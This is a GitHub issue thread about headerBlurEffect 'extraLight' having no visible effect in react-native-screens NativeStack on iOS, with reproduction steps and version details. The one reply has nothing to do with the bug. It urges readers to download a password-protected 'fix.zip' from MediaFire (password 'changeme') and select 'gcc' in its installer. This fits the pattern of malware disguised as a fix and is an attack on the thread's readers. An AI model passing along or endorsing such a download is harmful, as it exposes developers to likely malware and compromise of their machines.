### ISSUE TITLE
[NativeStack] headerBlurEffect: "extraLight" has no effect

### ISSUE THREAD

**Issue by stanleyoos** [software-mansion/react-native-screens#2320]
### Description

I want to use headerBlurEffect in NativeStack with value "extraLight" , but it seems to have no effect

https://github.com/user-attachments/assets/e8f3908b-3ecd-4682-b1c7-20701c111894

Same issue in `react-navigation` [repo](https://github.com/react-navigation/react-navigation/issues/12096)

### Steps to reproduce

1. clone the repo provided below
2. npm install && npm start
3. change the value of headerBlurEffect to "extraLight" as shown on the video 

### Snack or a link to a repository

https://github.com/stanleyoos/native-stack-reproduction

### Screens version

3.31.1

### React Native version

0.74.3

### Platforms

iOS

### JavaScript runtime

Hermes

### Workflow

Expo managed workflow

### Architecture

Paper (Old Architecture)

### Build type

Debug mode

### Device

iOS simulator

### Device model

iPhone 15 Pro (iOS 17.0)

### Acknowledgements

Yes

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
